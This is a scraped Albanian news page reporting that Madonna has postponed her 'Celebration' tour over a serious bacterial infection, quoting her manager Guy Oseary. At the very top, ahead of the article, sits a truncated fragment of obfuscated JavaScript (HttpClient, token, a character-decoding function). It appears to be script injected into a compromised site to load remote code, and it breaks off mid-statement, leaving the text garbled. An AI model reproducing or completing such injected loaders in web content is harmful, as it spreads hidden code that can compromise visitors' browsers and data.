;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Madonna po përballet me një infeksion serioz, shtyn turneun

By

Këngëtarja Madonna e ka shtyrë mbajtjen e turit të saj të koncerteve pasi është e sëmurë dhe do të qëndrojë në kujdesin intensiv për disa ditë.

Në një njoftim të lëshuar nga menaxheri i këngëtares, Guy Oseary, në Instagram ka deklaruar se të shtunën Madonnës i është shfaqur një infeksion serioz bakterial për të cilin ajo detyrohet të qëndrojë e shtrirë në spital për disa ditë.

“Shëndeti i saj është duke u përmirësuar, megjithatë ajo është nën përkujdesin mjekësor. Një shërim i plotë duhet të ndodh”.

“Në këtë kohë ne duhet të ndërprejmë për një periudhë të gjitha paraqitjet, përfshirë edhe turet e koncerteve”.

“Ne do të ndajmë detaje të tjera me për shëndetin e saj, por edhe do t’iu informojmë për datat e tureve”, ka thënë Oseary.

64-vjeçarja kishte për të perfomuar më 15 korrik në Vankuver të Kanadës turin e saj, “Celebration”.

Artikuj të ngjashëm